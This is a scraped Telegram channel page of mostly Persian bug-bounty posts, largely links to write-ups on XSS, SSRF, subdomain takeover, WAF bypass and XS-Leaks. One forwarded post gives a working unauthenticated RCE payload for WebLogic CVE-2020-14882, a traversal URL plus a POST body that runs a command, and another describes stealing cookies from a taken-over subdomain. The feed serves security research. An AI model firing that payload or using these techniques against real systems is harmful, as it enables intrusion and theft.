Web_Priv8
@web_priv8
766 subscribers
405 photos
24 videos
45 files
588 links
Sina Doosti @r00t98
Web Security Researcher, Bug Hunter
https://twitter.com/r00t98

Amir Hasanvand @al9n3_wolf
Web Security Researcher, Bug Hunter
https://twitter.com/al9n3_wolf
Download Telegram
About
Blog
Apps
Platform
Join
Web_Priv8
766 subscribers
Web_Priv8
Forwarded from امنیت اطلاعات
آسیب پذیری RCE در weblogic
بدون نیاز به احراز هویت

CVE-2020–14882

https://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal

POST:

_nfpb=true&_pageLabel=&handle=https://com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)


https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf

#weblogic
#rce
#java


@sec_nerd
652 viewsr00t98
Web_Priv8
https://twitter.com/r00t98/status/1322228492646391818
Twitter
Sina Doosti
هکروان اومده ده آسیب پذیری برتر باگ بانتی رو طبق تاثیرگذاری و جایزه توی سال 2020 بررسی و لیست کرده، اولیش XSS هست، اونوقت اینجا همین XSS رو گزارش بده به استارتاپ های مهم ایرانی مثل دیجیکالا که آخر 150 هزار تومن بهت کارت هدیه میدن =) https://t.co/1oBnGp9gPf
731 viewsr00t98, edited  
Web_Priv8
افزایش سطح دسترسی با تغییر ریسپانس.

https://amiyabehera03.medium.com/a-short-story-of-vertical-privilege-escalation-admin-account-takeover-c943c1711f62

#PrivEsc
#BugBounty

@web_priv8
Medium
A Short Story of Vertical Privilege Escalation (Admin Account Takeover)
Hello Guys, Hope all of you are doing well. I am Amiya Behera, an Information Security Analyst in a private organization . also a…
977 viewsr00t98
Web_Priv8
Forwarded from امنیت اطلاعات
https://github.com/jas502n/CVE-2020-14882


CVE-2020–14882


#weblogic
#rce
#java


@sec_nerd
GitHub
GitHub - jas502n/CVE-2020-14882: CVE-2020–14882、CVE-2020–14883
CVE-2020–14882、CVE-2020–14883. Contribute to jas502n/CVE-2020-14882 development by creating an account on GitHub.
635 viewsr00t98
Web_Priv8
Subdomain Takeover to Authentication bypass

یکی از تٲثیر های تصاحبِ زیردامنه یا Subdomain Takeover مربوط به دزدیدن کوکی های دامین اصلی میشه، برای مثال کوکی های x.com به دامنه تصاحب شده مثل z.x.com ارسال میشن(طبق RFC 6265)، حالا اینجا POC چیه؟ سادس، هکر برا گرفتن کوکی دوتا راه داره:
1- با زبان سمت سرور کوکی رو بگیره، مثلا فایل PHP اپلود کنه رو زیردامنه تصاحب شده.
2- با جاوااسکریپت کوکی رو بگیره، اینجاهم مثل اپلود HTML و بقیه موارد.

مزیت مورد اول نسبت به مورد دوم این هست که دیگه فلگِ HttpOnly اینجا معنی نمیده و هکر حتی با وجود فلگِ HttpOnly میتونه کوکی رو بگیره.
این گزارش دقیقا مثل مورد اوله و یه POC دیگه برا اکسپلویت CORS هم معرفی کرده.

#ATO
#BugBounty
#SubdomainTakeover

@web_priv8
2.74K viewsr00t98, edited  
Web_Priv8
Tunneling TCP over DNS

#OOB
#DNS
#RedTeam

@web_priv8
1.31K viewsr00t98, edited  
Web_Priv8
https://twitter.com/HusseiN98D/status/1325464364569276417

#LFI
#Bypass
#BugBounty
#BugBountyTip

@web_priv8
762 viewsr00t98, edited  
Web_Priv8
Forwarded from digMeMore (Yasho)
https://memoryleaks.ir/cafebazaar-web-application-account-takeover
مموری‌لیکس - نگاشته‌هایی پیرامون امنیت، شبکه و رمزنگاری
باگ ۱۵ میلیون تومانیِ تصاحب حساب کاربری در وب‌اپلیکیشن کافه‌بازار - مموری‌لیکس - نگاشته‌هایی پیرامون امنیت، شبکه و رمزنگاری
مقدمه من و یاشار شاهین‌زاده در راستای برنامه‌ی باگ‌بانتی کافه‌بازار آسیب‌پذیری‌های امنیتی مختلفی را شناسایی کردیم. در یکی از آسیب‌پذیری‌ها، وجود یک مشکل رمزنگاری به دور زدن فرایند احراز هویت (Authentication bypass) در وب‌اپلیکیشن کافه‌بازار منجر می‌شد. آسیب‌پذیری…
668 viewsr00t98
Web_Priv8
31k$ SSRF in Google Cloud Monitoring led to metadata exposure

https://nechudav.blogspot.com/2020/11/31k-ssrf-in-google-cloud-monitoring.html

#SSRF
#BugBounty

@web_priv8
Blogspot
31k$ SSRF in Google Cloud Monitoring led to metadata exposure
Update 25.01.2021: Added Google engineers exploit method for getting access token.   Google Cloud Monitoring (formerly called Stackdriver)...
762 viewsr00t98
Web_Priv8
دیدید بعضی وقت ها یسری XSS هایی که میگیرید قابل اکسپلویت نیست؟ مثل XSS از طریق هدرِ User-Agent یا هدرِ دیگه ای، اینجا محقق یه آسیب پذیری Request Smuggling گرفته و اومده اونو با یه XSS که از طریق هدر اتفاق میفتاده رو ترکیب و اکسپلویت کرده.

https://www.rcesecurity.com/2020/11/Smuggling-an-un-exploitable-xss/

#XSS
#Smuggling
#BugBounty

@web_priv8
946 viewsr00t98, edited  
Web_Priv8
Forwarded from digMeMore (Yasho)
https://memoryleaks.ir/where-to-start-secure-coding
مموری‌لیکس - نگاشته‌هایی پیرامون امنیت، شبکه و رمزنگاری
کدنویسی امن از کجا شروع می‌شود؟ - مموری‌لیکس - نگاشته‌هایی پیرامون امنیت، شبکه و رمزنگاری
مهم نیست که توسعه‌دهنده چه زبانی هستید و با چه تکنولوژی ای مشغول به کارید ! نقش این ویدئو، گذاشتن عینک امنیتی بر چشمان همه‌ی توسعه‌دهنده هایی که دوست دارن نرم افزارایی که تولید میکنن در بهترین سطوح امنیت باشه و قراره دروازه‌ای باشه تا اونها رو به دالان پر…
658 viewsr00t98
Web_Priv8
Bypassing the Redirect filters with 7 ways

https://elmahdi.tistory.com/m/4

#Bypass
#OpenRedirect
#BugBountyTip

@web_priv8
ElMahdi - マハディ
Bypassing the Redirect filters with 7 ways
Hello Bug Bounty Hunters, In this writeup I will be explaining various scenarios on how to bypass Open Redirect Filters that will lead to Open Redirect> ATO [0x01] Bypass the OAUTH Protection Via Path-URI Open redirect: I already reported a report about simple…
832 viewsr00t98
Web_Priv8
VPS Setup for Bug Bounty Recon Automation

https://link.medium.com/XtOM7vwMIbb

#Recon
#BugBounty
#BugBountyTip

@web_priv8
Medium
Beginners Guide: VPS Setup for Bug Bounty Recon Automation
Hello, All. My name is Ranjan. I am a final year CS undergrad and a part-time bug bounty hunter. Due to college, I don’t get enough time…
864 viewsr00t98, edited  
Web_Priv8
Forwarded from digMeMore (Yasho)
https://memoryleaks.ir/analysis-of-xss-found-in-bug-bounty/
مموری‌لیکس - نگاشته‌هایی پیرامون امنیت، شبکه و رمزنگاری
روش کشف XSS در برنامه بانتی خارجی - مموری‌لیکس - نگاشته‌هایی پیرامون امنیت، شبکه و رمزنگاری
سلام عماد هستم، این اولین نوشتار من برای مموری لیکز هست، تو این نوشتار میخواهیم یک بررسی بر روی فرآیند Automate کردن XSS داشته باشیم که بتونیم تو کمترین زمان ممکن به نتیجه برسیم. داستان از کشف آسیب‌پذیری Reflected DOM XSS توی یکی از برنامه‌های باگ‌بانتی خارجی…
766 viewsr00t98
Web_Priv8
Sub-Drill
A very (very) simple subdomain finder based on online, free and API-less services.

https://github.com/Fadavvi/Sub-Drill

#Tool
#Recon
#Subdomain

@web_priv8
GitHub
GitHub - Fadavvi/Sub-Drill: A very (very) FAST and simple subdomain finder based on online & free services. Without any configuration…
A very (very) FAST and simple subdomain finder based on online & free services. Without any configuration requirements. - GitHub - Fadavvi/Sub-Drill: A very (very) FAST and simple subdomai...
815 viewsr00t98, edited  
Web_Priv8
This media is not supported in your browser
VIEW IN TELEGRAM
دور زدنِ reCAPTCHA گوگل توسط Race Condition

https://portswigger.net/research/cracking-recaptcha-turbo-intruder-style

#RC
#Bypass
#PortSwigger

@web_priv8
855 viewsr00t98
Web_Priv8
تکنیک های مدرنِ بایپس WAF برای حملات اتوماتیک.

https://www.infoq.com/presentations/waf-scripting-techniques-autonomous-attacks/

#WAF
#Bypass

@web_priv8
966 viewsr00t98
Web_Priv8
Forwarded from ناویا، ماشین کاوش اپلای
نوع جدیدی از حملات Side-Channel روی وب: حملات XS-Leaks

در حملات CSRF، مهاجم از یک منبع دیگه (مثلا وبسایت خودش)، می‌تونه بواسطه‌ی فرد قربانی، کنش‌های مدنظرشو روی یه وبسایت خاص (مثل پرتال بانک فرد قربانی) انجام بده. توی XS-Leaks این قضیه برعکسه: با انجام کنش‌هایی روی وبسایتی خاص (مثل بانک فرد قربانی)، می‌شه اطلاعاتی از قربانی بدست اورد. این نوع جدیدی از بردار حملاته که در سطح وب می‌تونه فراگیر بشه. این وبسایت، مستندات جامعی از این حملات داره.
@offsecmag
859 viewsr00t98
Web_Priv8
Forwarded from ناویا، ماشین کاوش اپلای
چرا فایروال‌های تحت وب دور می‌خورند و عموما بدردنخورند؟ مورد ۴۵۶۷ام.

اضافه‌شدن یک کاراکتر (0x0A) به پیلود حمله، بعنوان یک بلوک از داده‌های بی‌مصرف (Padding)، فایروال رو جوری گمراه می‌کنه که اون بلوک (که در اینجا یک کاراکتر هست) رو حذف کنه و بقیه پیلود (که مخرب هست) رو نادیده بگیره. این موردی از کلودفلیر بود.
@offsecmag
1.02K viewsr00t98